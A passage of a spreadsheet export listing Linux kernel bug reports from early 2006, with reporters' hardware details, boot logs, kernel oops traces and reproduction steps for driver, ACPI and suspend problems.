Link [APSI] -&gt; GSI 21 (level, low) -&gt; IRQ 20 PCI: Setting latency timer of device 0000:00:07.0 to 64 ata1: SATA max UDMA/133 cmd 0x9F0 ctl 0xBF2 bmdma 0xD800 irq 20 ata2: SATA max UDMA/133 cmd 0x970 ctl 0xB72 bmdma 0xD808 irq 20 usb 2-1: new low speed USB device using ohci_hcd and address 2 ata1: no device found (phy stat 00000000) scsi0 : sata_nv input: USB HID v1.10 Joystick [Microsoft SideWinder Precision 2 Joystick] on usb-0000:00:02.0-1 ata2: no device found (phy stat 00000000) scsi1 : sata_nv ACPI: PCI Interrupt Link [APSJ] enabled at IRQ 20 ACPI: PCI Interrupt 0000:00:08.0[A] -&gt; Link [APSJ] -&gt; GSI 20 (level, low) -&gt; IRQ 21 PCI: Setting latency timer of device 0000:00:08.0 to 64 ata3: SATA max UDMA/133 cmd 0x9E0 ctl 0xBE2 bmdma 0xC400 irq 21 ata4: SATA max UDMA/133 cmd 0x960 ctl 0xB62 bmdma 0xC408 irq 21 usb 2-2: new low speed USB device using ohci_hcd and address 3 ata3: no device found (phy stat 00000000) scsi2 : sata_nv input: USB HID v1.00 Gamepad [Microsoft SideWinder Game Pad Pro USB version 1.0] on usb-0000:00:02.0-2 ata4: no device found (phy stat 00000000) scsi3 : sata_nv ReiserFS: hda2: found reiserfs format "3.6" with standard journal ieee1394: Host added: ID:BUS[0-00:1023] GUID[0011d800004b13a5] ReiserFS: hda2: using ordered data mode ReiserFS: hda2: journal params: device hda2, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 ReiserFS: hda2: checking transaction log (hda2) ReiserFS: hda2: Using r5 hash to sort names Adding 538168k swap on /dev/hda4. Priority:-1 extents:1 across:538168k ReiserFS: hda1: found reiserfs format "3.6" with standard journal ReiserFS: hda1: using ordered data mode ReiserFS: hda1: journal params: device hda1, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 ReiserFS: hda1: checking transaction log (hda1) ReiserFS: hda1: Using r5 hash to sort names ReiserFS: hda3: found reiserfs format "3.6" with standard journal ReiserFS: hda3: using ordered data mode ReiserFS: hda3: journal params: device hda3, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 ReiserFS: hda3: checking transaction log (hda3) ReiserFS: hda3: Using r5 hash to sort names NTFS volume version 3.1. i2c_adapter i2c-0: nForce2 SMBus adapter at 0x4c00 i2c_adapter i2c-1: nForce2 SMBus adapter at 0x4c40 ACPI: PCI Interrupt Link [APCJ] enabled at IRQ 23 ACPI: PCI Interrupt 0000:00:04.0[A] -&gt; Link [APCJ] -&gt; GSI 23 (level, low) -&gt; IRQ 18 PCI: Setting latency timer of device 0000:00:04.0 to 64 intel8x0_measure_ac97_clock: measured 54849 usecs intel8x0: clocking to 46874 forcedeth.c: Reverse Engineered nForce ethernet driver. Version 0.41. ACPI: PCI Interrupt Link [APCH] enabled at IRQ 22 ACPI: PCI Interrupt 0000:00:0a.0[A] -&gt; Link [APCH] -&gt; GSI 22 (level, low) -&gt; IRQ 19 PCI: Setting latency timer of device 0000:00:0a.0 to 64 eth0: forcedeth.c: subsystem: 01043:8141 bound to 0000:00:0a.0 nvidia: module license 'NVIDIA' taints kernel. ACPI: PCI Interrupt Link [APC3] enabled at IRQ 18 ACPI: PCI Interrupt 0000:01:00.0[A] -&gt; Link [APC3] -&gt; GSI 18 (level, low) -&gt; IRQ 22 PCI: Setting latency timer of device 0000:01:00.0 to 64 NVRM: loading NVIDIA Linux x86_64 NVIDIA Kernel Module 1.0-8178 Wed Dec 14 16:58:07 PST 2005 parport0: PC-style at 0x378 (0x778) [PCSPP,TRISTATE] parport0: irq 7 detected parport0: Printer, Hewlett-Packard HP LaserJet 5P lp0: using parport0 (polling). eth0: no IPv6 routers present atkbd.c: Spurious ACK on isa0060/serio0. Some program, like XFree86, might be trying access hardware directly. atkbd.c: Spurious ACK on isa0060/serio0. Some program, like XFree86, might be trying access hardware directly.</t>
  </si>
  <si>
    <t>hdparm -U oops</t>
  </si>
  <si>
    <t>2.6.12.6</t>
  </si>
  <si>
    <t>2006-01-05 09:38 UTC</t>
  </si>
  <si>
    <t>Mike Concannon</t>
  </si>
  <si>
    <t>2008-12-07 05:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown - never tried before Distribution: CentOS4.1 with stock kernel.org kernel Hardware Environment: Dell inspiron 8600 2GHz PentiumM Software Environment: See above Problem Description: Steps to reproduce:</t>
  </si>
  <si>
    <t>logfile flooded with ACPI error messages on FuSi Amilo M1439G</t>
  </si>
  <si>
    <t>2006-01-05 14:23 UTC</t>
  </si>
  <si>
    <t>Marcus Fischer</t>
  </si>
  <si>
    <t>2006-02-03 02:53 UTC</t>
  </si>
  <si>
    <t>Hello all, I have some trouble with the ACPI functions with my Fujitsu-Siemens Amilo M1439G laptop. I get this message with 2.6.12 kernel from Mandriva 2006.0, but also with a plain 2.6.15 kernel, which is also available in their cooker repository. My /var/log/messages is flooded by the following lines: Dec 28 16:11:32 mflaptop kernel: ACPI-0405: *** Error: Handler for [EmbeddedControl] returned AE_TIME Dec 28 16:11:32 mflaptop kernel: ACPI-1138: *** Error: Method execution failed [\_SB_.PCI0.BAT0._BIF] (Node c18f0480), AE_TIME Dec 28 16:11:37 mflaptop kernel: ACPI-0405: *** Error: Handler for [EmbeddedControl] returned AE_TIME Dec 28 16:11:37 mflaptop kernel: ACPI-1138: *** Error: Method execution failed [\_SB_.PCI0.BAT0._BIF] (Node c18f0480), AE_TIME Dec 28 16:11:43 mflaptop kernel: ACPI-0405: *** Error: Handler for [EmbeddedControl] returned AE_TIME Dec 28 16:11:43 mflaptop kernel: ACPI-1138: *** Error: Method execution failed [\_SB_.PCI0.BAT0._BIF] (Node c18f0480), AE_TIME Dec 28 16:11:45 mflaptop kernel: ACPI-0405: *** Error: Handler for [EmbeddedControl] returned AE_TIME Dec 28 16:11:45 mflaptop kernel: ACPI-1138: *** Error: Method execution failed [\_SB_.PCI0.BAT0._BST] (Node c18f0440), AE_TIME Dec 28 16:11:45 mflaptop kernel: ACPI-0405: *** Error: Handler for [EmbeddedControl] returned AE_TIME Dec 28 16:11:45 mflaptop kernel: ACPI-1138: *** Error: Method execution failed [\_SB_.PCI0.BAT0._BIF] (Node c18f0480), AE_TIME Dec 28 16:11:47 mflaptop kernel: ACPI-0405: *** Error: Handler for [EmbeddedControl] returned AE_TIME Dec 28 16:11:47 mflaptop kernel: ACPI-1138: *** Error: Method execution failed [\_SB_.PCI0.BAT0._BIF] (Node c18f0480), AE_TIME Dec 28 16:11:56 mflaptop kernel: ACPI-0405: *** Error: Handler for [EmbeddedControl] returned AE_TIME Dec 28 16:11:56 mflaptop kernel: ACPI-1138: *** Error: Method execution failed [\_SB_.PCI0.BAT0._BIF] (Node c18f0480), AE_TIME Dec 28 16:12:14 mflaptop kernel: ACPI-0405: *** Error: Handler for [EmbeddedControl] returned AE_TIME Dec 28 16:12:14 mflaptop kernel: ACPI-1138: *** Error: Method execution failed [\_SB_.PCI0.BAT0._BST] (Node c18f0440), AE_TIME Dec 28 16:12:19 mflaptop kernel: ACPI-0405: *** Error: Handler for [EmbeddedControl] returned AE_TIME Dec 28 16:12:19 mflaptop kernel: ACPI-1138: *** Error: Method execution failed [\_SB_.PCI0.BAT0._BIF] (Node c18f0480), AE_TIME Dec 28 16:12:21 mflaptop kernel: ACPI-0405: *** Error: Handler for [EmbeddedControl] returned AE_TIME Dec 28 16:12:21 mflaptop kernel: ACPI-1138: *** Error: Method execution failed [\_SB_.PCI0.BAT0._BIF] (Node c18f0480), AE_TIME Dec 28 16:12:23 mflaptop kernel: ACPI-0405: *** Error: Handler for [EmbeddedControl] returned AE_TIME Dec 28 16:12:23 mflaptop kernel: ACPI-1138: *** Error: Method execution failed [\_SB_.PCI0.BAT0._BIF] (Node c18f0480), AE_TIME Dec 28 16:12:32 mflaptop kernel: ACPI-0405: *** Error: Handler for [EmbeddedControl] returned AE_TIME Dec 28 16:12:32 mflaptop kernel: ACPI-1138: *** Error: Method execution failed [\_SB_.PCI0.BAT0._BIF] (Node c18f0480), AE_TIME Can you please send feedback about the information, I have to provide to solve these issues? - I don't know how to debug the source of these errors. Along with these messages, I sometimes see problems with the battery-applet in the gnome tray: When using the touchpad, the load info jump arround. Maximum is the actual load of the battery, minimum is 0% battery capacity. Regards, Marcus</t>
  </si>
  <si>
    <t>uli526x partially recognizing interface</t>
  </si>
  <si>
    <t>2006-01-05 15:25 UTC</t>
  </si>
  <si>
    <t>Quentin Decavel</t>
  </si>
  <si>
    <t>2008-02-17 10:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15 from kernel.org Distribution: Debian Sarge 3.1 Hardware Environment: AMD Turion 64 ML 32 Software Environment: Problem Description: uli526x loaded as module detects the eth0 interface, but ifconfig complains that the cable is not plugged (even if it is) and thus eth0 cannot be correctly configured relevant line from lspci: 0000:00:1b.0 Ethernet controller: ALi Corporation: Unknown device 5263 (rev 50) dmesg | grep eth0: eth0: ULi 5263 at pci:0000:00:1b.0, 00:40:d0:7f:c6:d8, irq 17 ADDRCONF(NETDEV_UP): eth0: link is not ready ADDRCONF(NETDEV_UP): eth0: link is not ready uli526x: eth0 NIC Link is Down Steps to reproduce: boot kernel 2.6.15, then dhclient eth0</t>
  </si>
  <si>
    <t>**** SET: Misaligned resource pointer: f7db5502</t>
  </si>
  <si>
    <t>2.6.15-mm1</t>
  </si>
  <si>
    <t>2006-01-05 21:16 UTC</t>
  </si>
  <si>
    <t>ACPICA 20051216 on a T40 prints this: **** SET: Misaligned resource pointer: f7db5502</t>
  </si>
  <si>
    <t>ipw2100 driver + WPA encryption = crash</t>
  </si>
  <si>
    <t>Vanilla 2.6.15</t>
  </si>
  <si>
    <t>2006-01-06 01:25 UTC</t>
  </si>
  <si>
    <t>2006-06-27 00:37 UTC</t>
  </si>
  <si>
    <t>drivers_network-wireless@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: Slackware Hardware Environment: IBM R40 laptop Software Environment: wpa_supplicant v0.4.6 Problem Description: After booting with ipw2100 enabled, everithing goes well and wireless led is successifully turned on and operational. But once I launch wpa_supplicant, kernel crashes with following trace: Jan 6 10:11:28 vilma kernel: Unable to handle kernel NULL pointer dereference at virtual address 00000000 Jan 6 10:11:28 vilma kernel: printing eip: Jan 6 10:11:28 vilma kernel: 00000000 Jan 6 10:11:28 vilma kernel: *pde = 00000000 Jan 6 10:11:28 vilma kernel: Oops: 0000 [#1] Jan 6 10:11:28 vilma kernel: PREEMPT Jan 6 10:11:28 vilma kernel: Modules linked in: ieee80211_crypt_tkip bluetooth snd_pcm_oss snd_mixer_oss usbhid 8250_pnp uhci_hcd ehci_hcd u sbcore snd_intel8x0 snd_intel8x0m snd_ac97_codec snd_ac97_bus snd_pcm snd_timer snd soundcore snd_page_alloc 8250_pci 8250 serial_core ipw210 0 ieee80211 ieee80211_crypt e100 pcmcia firmware_class crc32 yenta_socket rsrc_nonstatic pcmcia_core nls_iso8859_1 nls_cp437 vfat fat nls_bas e reiserfs Jan 6 10:11:28 vilma kernel: CPU: 0 Jan 6 10:11:28 vilma kernel: EIP: 0060:[&lt;00000000&gt;] Not tainted VLI Jan 6 10:11:28 vilma kernel: EFLAGS: 00010246 (2.6.15) Jan 6 10:11:28 vilma kernel: EIP is at _stext+0x3feffde0/0x42 Jan 6 10:11:28 vilma kernel: eax: e0a613c0 ebx: 00000000 ecx: 00000000 edx: dcd0f460 Jan 6 10:11:28 vilma kernel: esi: 00000001 edi: dcd0f474 ebp: df5a4260 esp: db11fdd0 Jan 6 10:11:28 vilma kernel: ds: 007b es: 007b ss: 0068 Jan 6 10:11:28 vilma kernel: Process wpa_supplicant (pid: 4912, threadinfo=db11e000 task=df0060b0) Jan 6 10:11:28 vilma kernel: Stack: e09f7078 00000000 000000d0 0000008d db737cc0 00000000 dcd0f460 df5a45e8 Jan 6 10:11:28 vilma kernel: e09f79c1 00000000 00000000 df5a4000 00000404 00000000 00000000 00000000 Jan 6 10:11:28 vilma kernel: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 Jan 6 10:11:28 vilma kernel: Call Trace: Jan 6 10:11:28 vilma kernel: [&lt;e09f7078&gt;] ieee80211_wx_set_encodeext+0x3e0/0x53e [ieee80211] Jan 6 10:11:28 vilma kernel: [&lt;c026be2e&gt;] wireless_process_ioctl+0x5d9/0x815 Jan 6 10:11:28 vilma kernel: [&lt;e0a1dc68&gt;] ipw2100_wx_set_encodeext+0x0/0x16 [ipw2100] Jan 6 10:11:28 vilma kernel: [&lt;c025f4de&gt;] dev_load+0x26/0x72 Jan 6 10:11:28 vilma kernel: [&lt;c02610fa&gt;] dev_ioctl+0x117/0x32a Jan 6 10:11:28 vilma kernel: [&lt;c025633e&gt;] sock_ioctl+0xcb/0x233 Jan 6 10:11:28 vilma kernel: [&lt;c016b02a&gt;] do_ioctl+0x9a/0xa9 Jan 6 10:11:28 vilma kernel: [&lt;c01cf4d4&gt;] copy_from_user+0x46/0x7e Jan 6 10:11:28 vilma kernel: [&lt;c016b1d0&gt;] vfs_ioctl+0x65/0x1e1 Jan 6 10:11:28 vilma kernel: [&lt;c016b391&gt;] sys_ioctl+0x45/0x6c Jan 6 10:11:28 vilma kernel: [&lt;c0103041&gt;] syscall_call+0x7/0xb Jan 6 10:11:28 vilma kernel: Code: Bad EIP value. wpa paramethers: /usr/local/sbin/wpa_supplicant -ieth1 -d -c /etc/wpa-config.txt -Dwext cat /etc/wpa-config.txt ctrl_interface=/var/run/wpa_supplicant #ctrl_interface_group=0 #eapol_version=1 #fast_reauth=1 ap_scan=1 network={ ssid="Casa DDIM" bssid=&lt;ID&gt; proto=WPA key_mgmt=WPA-PSK pairwise=TKIP group=TKIP psk="&lt;KEY&gt;" }</t>
  </si>
  <si>
    <t>kissattach locks up system</t>
  </si>
  <si>
    <t>2006-01-06 03:02 UTC</t>
  </si>
  <si>
    <t>Mike McCarthy</t>
  </si>
  <si>
    <t>2006-01-19 09:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.14-5 Distribution: kernel.org kernel source on openSuSE 10.0 Hardware Environment: i386, 1GHz PIII Software Environment: Ham Radio Problem Description: Issuing a kissattach command locks up system Steps to reproduce: 1. Build and install 2.6.15 kernel with ax25 and mkiss hamradio compiled in or modules. 2. Build and install libax25, ax25-tools and ax25-apps from sourceforge or distro ftp site. 3. Configure /etc/ax25/axports for simple tnc &gt;# /etc/ax25/axports &gt;# &gt;# The format of this file is: &gt;# &gt;# name callsign speed paclen window description # &gt;2m W1NR-9 19200 255 2 145.650 MHz (1200 bps) 4. Configure /etc/ax25/ax25d.conf &gt;# /etc/ax25/ax25d.conf &gt;# &gt;# ax25d Configuration File. &gt;# &gt;# AX.25 Ports begin with a '['. &gt;# &gt;[W1NR VIA 2m] &gt;parameters 2 1 6 900 * 15 0 &gt;NOCALL * * * * * * L &gt;default * * * * * * - root /spider/src/client client %s ax25 5. Bind to serial port with kissattach &gt;worf:~ # kissattach /dev/ttyS0 2m 44.56.10.3 &gt;AX.25 port 2m bound to device ax0 System is locked up hard at this point. This is new to 2.6.15 and is not reproducible in 2.6.14-5.</t>
  </si>
  <si>
    <t>irq 185: nobody cared</t>
  </si>
  <si>
    <t>2006-01-06 14:22 UTC</t>
  </si>
  <si>
    <t>2007-09-06 16:28 UTC</t>
  </si>
  <si>
    <t>Distribution: ubuntu 5.10 Hardware Environment: motherboard ASUS P5LD2-VM, SATA Segate Brracuda Problem Description: This message i get if i use sate with pata there is no problem: [ 32.081190] usb 3-1: new low speed USB device using uhci_hcd and address 2 [ 32.238901] irq 185: nobody cared (try booting with the "irqpoll" option) [ 32.238951] [ 32.238952] Call Trace: &lt;IRQ&gt; &lt;ffffffff8014a350&gt;{__report_bad_irq+48} &lt;ffffffff8014a545&gt;{note_interrupt+424} [ 32.239149] &lt;ffffffff80149f87&gt;{__do_IRQ+137} &lt;ffffffff80110c02&gt;{do_IRQ+45} [ 32.239310] &lt;ffffffff8010eb20&gt;{ret_from_intr+0} &lt;EOI&gt; &lt;ffffffff80311c4e&gt;{thread_return+0} [ 32.239497] &lt;ffffffff8010cca6&gt;{mwait_idle+51} &lt;ffffffff8010cc52&gt;{cpu_idle+63} [ 32.239659] &lt;ffffffff80490738&gt;{start_kernel+383} &lt;ffffffff8049024c&gt;{_sinittext+588} [ 32.239821] [ 32.239921] handlers: [ 32.239961] [&lt;ffffffff802a001c&gt;] (usb_hcd_irq+0x0/0x53) [ 32.240058] Disabling IRQ #185 [ 32.245777] usbcore: registered new driver hiddev</t>
  </si>
  <si>
    <t>2.6.14/15 PCI-X scan fails if ACPI MCFG is enabled.</t>
  </si>
  <si>
    <t>2006-01-07 07:25 UTC</t>
  </si>
  <si>
    <t>Gilboa Davara</t>
  </si>
  <si>
    <t>2008-05-01 17:11 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: FC4 x86_64 2.6.13-1532smp. Distribution: Fedora Core 4. x86_64. Hardware Environment: Motherboard: Tyan Thunder K8WE, BIOS 1.01. nVidia nForce Professional 2200 and 2050 chipset. 4 x 512MB PC3200 ECC/REG. 550w PP&amp;C SLI PSU. Expansion Slots: Slot0: PCI-E 16x, free. Slot1: PCI, Creative Sound Blaster Audigy 2zs. Slot2: PCI-E 16x, Gigabyte GF6800GT/256MB. Slot3: PCI-X 133Mhz, free. Slot4: PCI-X 100Mhz, free. Slot5: PCI-X 100Mhz, Adaptec 29160/PCI64bit. Disk Drives: 4 x 36GB 10K RPM U160 SCSI in software MD5/LVM setup. 1 x IDE DVDRW drive. Software Environment: Fedora Core 4. ARCH: x86_64 GCC: 4.0.2 20051125 GLIBC: 2.3.5 Problem Description: Machine was problem free using 2.6.11 (FC3, both i386 and 64bit kernels), 2.6.12 and 2.6.14 kernels. Fails to boot with 2.6.14 and 2.6.15 kernels. Both vanilla and FC4 builds. When the machine tries to boot using a 14/15 kernel, the aic7xxx module is loaded, but does not detect any device. (No output is printed after the initial module load. See attached logs) I tried building a 2.6.15 vanilla kernel with all aic7xxxx debug options turned on, but saw nothing. I tried using both normal and PCI=routeirq both both failed. Steps to reproduce: 1. Build kernel using suppled configuration file. (See below) 2. Try booting. 3. aic7xxx loads. No output. 4. Devices are not detected, root mount fails. 5. Kernel panic.</t>
  </si>
  <si>
    <t>Regression. Suspend is not working: Restarting tasks...&lt;6&gt; Strange, kedac not stopped</t>
  </si>
  <si>
    <t>2.6.15-mm1 - 2.6.15-mm2</t>
  </si>
  <si>
    <t>2006-01-07 12:10 UTC</t>
  </si>
  <si>
    <t>2006-02-13 17:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:Only with 2.6.15-mm1 - 2.6.15-mm2 Distribution:ubuntu breezy 64-bit Hardware Environment: Board ASUS P5LD2-VM (i945g + Celeron D) echo mem &gt; /sys/power/state, not working for me with this too kernels. [ 1361.985691] Stopping tasks: ============================================================================== [ 1367.982503] stopping tasks failed (1 tasks remaining) [ 1367.982543] Restarting tasks...&lt;6&gt; Strange, kedac not stopped [ 1367.982764] done</t>
  </si>
  <si>
    <t>grip module crashes system since 2.6.15</t>
  </si>
  <si>
    <t>2006-01-07 13:16 UTC</t>
  </si>
  <si>
    <t>2006-02-03 12:21 UTC</t>
  </si>
  <si>
    <t>I have a Gravis Gamepad Pro connected to a gameport and am using the "grip" kernel module. However if I try to access /dev/input/js0 with jstest or some other programm my system freezes completely. This also happens if I connect the gamepad to another gameport (I have a ns558 and an emu10k1 gameport) The "analog" joystick module works if I change the switch on the back of the gamepad. This problem does not occur with kernel 2.6.14. Regards, Julien Langer</t>
  </si>
  <si>
    <t>bttv ALSA btaudio don't detected</t>
  </si>
  <si>
    <t>2006-01-07 14:23 UTC</t>
  </si>
  <si>
    <t>2006-01-12 05:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.11 see attach bttv an ALSA boot sections with bttv: driver version 0.9.15 works well ALSA device list: #0: Intel ICH with AD1981B at 0xdfebfe00, irq 23 #1: Brooktree Bt878 at 0xd0000000, irq 16 #2: Virtual MIDI Card 1 Distribution: Debian unstable Hardware Environment: lspci 0000:00:00.0 Host bridge: Intel Corporation 915G/P/GV/GL/PL/910GL Processor to I/O Controller (rev 04) 0000:00:01.0 PCI bridge: Intel Corporation 915G/P/GV/GL/PL/910GL PCI Express Root Port (rev 04) 0000:00:02.0 VGA compatible controller: Intel Corporation 82915G/GV/910GL Express Chipset Family Graphics Controller (rev 04) 0000:00:02.1 Display controller: Intel Corporation 82915G Express Chipset Family Graphics Controller (rev 04) 0000:00:1c.0 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 1 (rev 03) 0000:00:1c.1 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 2 (rev 03) 0000:00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 03) 0000:00:1d.1 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #2 (rev 03) 0000:00:1d.2 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #3 (rev 03) 0000:00:1d.3 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #4 (rev 03) 0000:00:1d.7 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB2 EHCI Controller (rev 03) 0000:00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev d3) 0000:00:1e.2 Multimedia audio controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Audio Controller (rev 03) 0000:00:1f.0 ISA bridge: Intel Corporation 82801FB/FR (ICH6/ICH6R) LPC Interface Bridge (rev 03) 0000:00:1f.1 IDE interface: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) IDE Controller (rev 03) 0000:00:1f.2 IDE interface: Intel Corporation 82801FB/FW (ICH6/ICH6W) SATA Controller (rev 03) 0000:00:1f.3 SMBus: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) SMBus Controller (rev 03) 0000:02:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5751 Gigabit Ethernet PCI Express (rev 01) 0000:04:00.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 02) 0000:04:00.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 02) lspci -n 0000:00:00.0 0600: 8086:2580 (rev 04) 0000:00:01.0 0604: 8086:2581 (rev 04) 0000:00:02.0 0300: 8086:2582 (rev 04) 0000:00:02.1 0380: 8086:2782 (rev 04) 0000:00:1c.0 0604: 8086:2660 (rev 03) 0000:00:1c.1 0604: 8086:2662 (rev 03) 0000:00:1d.0 0c03: 8086:2658 (rev 03) 0000:00:1d.1 0c03: 8086:2659 (rev 03) 0000:00:1d.2 0c03: 8086:265a (rev 03) 0000:00:1d.3 0c03: 8086:265b (rev 03) 0000:00:1d.7 0c03: 8086:265c (rev 03) 0000:00:1e.0 0604: 8086:244e (rev d3) 0000:00:1e.2 0401: 8086:266e (rev 03) 0000:00:1f.0 0601: 8086:2640 (rev 03) 0000:00:1f.1 0101: 8086:266f (rev 03) 0000:00:1f.2 0101: 8086:2651 (rev 03) 0000:00:1f.3 0c05: 8086:266a (rev 03) 0000:02:00.0 0200: 14e4:1677 (rev 01) 0000:04:00.0 0400: 109e:036e (rev 02) 0000:04:00.1 0480: 109e:0878 (rev 02) Software Environment: 2.6.15 Debian unstable Problem Description: The btaudio device is not dectected by kernels (AFAIK) higher than 2.6.11 with bttv: driver version 0.9.16 ALSA device list: #0: Intel ICH6 with AD1981B at 0xdfebfe00, irq 22 #2: Virtual MIDI Card 1 Steps to reproduce: Just use kernels higher than 2.6.11</t>
  </si>
  <si>
    <t>2.6.15.1</t>
  </si>
  <si>
    <t>cpusets: BUG: cpuset_excl_nodes_overlap() may sleep under tasklist_lock</t>
  </si>
  <si>
    <t>2006-01-09 14:51 UTC</t>
  </si>
  <si>
    <t>Darrick J. Wong</t>
  </si>
  <si>
    <t>2006-04-22 12:34 UTC</t>
  </si>
  <si>
    <t>Paul Jackson</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13 Distribution: Ubuntu 6.04 Hardware Environment: IBM IntelliStation Z20, 2x 3.4GHz Xeons, 2G RAM, 2x 80GB SATA disks Software Environment: Problem Description: cpuset_excl_nodes_overlap() may sleep (as it takes semaphore), but is called from atomic context - select_bad_process() under tasklist_lock. BUG. Found by Denis Lunev. Steps to reproduce: Run pounder2 stress tests overnight until OOM occurs, and then watch the debug messages pour off the screen: Debug: sleeping function called from invalid context at include/asm/semaphore.h:105 in_atomic():1, irqs_disabled():0 Call Trace:&lt;ffffffff80130640&gt;{__might_sleep+179} &lt;ffffffff8015bb68&gt;{cpuset_excl_nodes_overlap+31} &lt;ffffffff80164d9f&gt;{out_of_memory+123} &lt;ffffffff801676c4&gt;{__alloc_pages+564} &lt;ffffffff8017ec41&gt;{alloc_pages_current+160} &lt;ffffffff8016873f&gt;{__do_page_cache_readahead+197} &lt;ffffffff8010e5c3&gt;{__switch_to+50} &lt;ffffffff8031c547&gt;{_spin_unlock_irqrestore+52} &lt;ffffffff80166604&gt;{free_pages_bulk+674} &lt;ffffffff80168a00&gt;{do_page_cache_readahead+82} &lt;ffffffff8016355a&gt;{filemap_nopage+332} &lt;ffffffff8017378f&gt;{__handle_mm_fault+1162} &lt;ffffffff8031c547&gt;{_spin_unlock_irqrestore+52} &lt;ffffffff8031df02&gt;{do_page_fault+1096} &lt;ffffffff801991ee&gt;{sys_select+839} &lt;ffffffff8011078d&gt;{error_exit+0} Eventually it becomes a never-ending stream of this: scheduling while atomic: dd/0x00000001/510 Call Trace:&lt;ffffffff8031a847&gt;{schedule+122} &lt;ffffffff8031c31f&gt;{__down+229} &lt;ffffffff80132ef7&gt;{default_wake_function+0} &lt;ffffffff8031bf88&gt;{__down_failed+53} &lt;ffffffff8015cfbe&gt;{.text.lock.cpuset+85} &lt;ffffffff80164d9f&gt;{out_of_memory+123} &lt;ffffffff801676c4&gt;{__alloc_pages+564} &lt;ffffffff8017ed26&gt;{alloc_page_vma+221} &lt;ffffffff8017ae57&gt;{read_swap_cache_async+74} &lt;ffffffff801717b4&gt;{swapin_readahead+97} &lt;ffffffff8031c48c&gt;{_read_unlock_irq+46} &lt;ffffffff80173a9b&gt;{__handle_mm_fault+1942} &lt;ffffffff8031c547&gt;{_spin_unlock_irqrestore+52} &lt;ffffffff8031df02&gt;{do_page_fault+1096} &lt;ffffffff802050ab&gt;{_raw_spin_trylock+8} &lt;ffffffff801acb0c&gt;{inotify_dentry_parent_queue_event+136} &lt;ffffffff8011078d&gt;{error_exit+0}</t>
  </si>
  <si>
    <t>ata_piix disables SATA drives at boot</t>
  </si>
  <si>
    <t>2006-01-10 16:09 UTC</t>
  </si>
  <si>
    <t>Grzegorz Herman</t>
  </si>
  <si>
    <t>2007-08-08 20:52 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: ? (around 2.6.9 was OK) Distribution: Gentoo Hardware Environment: Intel TD945GTP motherboard Software Environment: Gentoo Problem Description: The disks connected to the SATA controller are not visible (before they were visible as /dev/sd[abc]). The kernel log mentions disabling them: ... Dec 13 19:51:37 tachyon libata version 1.12 loaded. Dec 13 19:51:37 tachyon ata_piix version 1.04 Dec 13 19:51:37 tachyon ACPI: PCI Interrupt 0000:00:1f.2[B] -&gt; GSI 19 (level, low) -&gt; IRQ 18 Dec 13 19:51:37 tachyon PCI: Setting latency timer of device 0000:00:1f.2 to 64 Dec 13 19:51:37 tachyon ata1: SATA max UDMA/133 cmd 0x20C8 ctl 0x20EE bmdma 0x20A0 irq 18 Dec 13 19:51:37 tachyon ata2: SATA max UDMA/133 cmd 0x20C0 ctl 0x20EA bmdma 0x20A8 irq 18 Dec 13 19:51:37 tachyon ATA: abnormal status 0x7F on port 0x20CF Dec 13 19:51:37 tachyon ata1: disabling port Dec 13 19:51:37 tachyon scsi0 : ata_piix Dec 13 19:51:37 tachyon ATA: abnormal status 0x7F on port 0x20C7 Dec 13 19:51:37 tachyon ata2: disabling port Dec 13 19:51:37 tachyon scsi1 : ata_piix ... Bug originally posted as http://bugs.gentoo.org/show_bug.cgi?id=115441 Confirmed with vanilla kernel 2.6.15_rc7. Steps to reproduce: 1. install kernel 2.6.14 with ata_piix built-in or modular 2. reboot into the new kernel 3. ls /dev</t>
  </si>
  <si>
    <t>Harddrive doesn't wake up from S3 sleep when using the amd74xx driver</t>
  </si>
  <si>
    <t>2006-01-11 05:20 UTC</t>
  </si>
  <si>
    <t>Hette Visser</t>
  </si>
  <si>
    <t>2007-08-11 14:27 UTC</t>
  </si>
  <si>
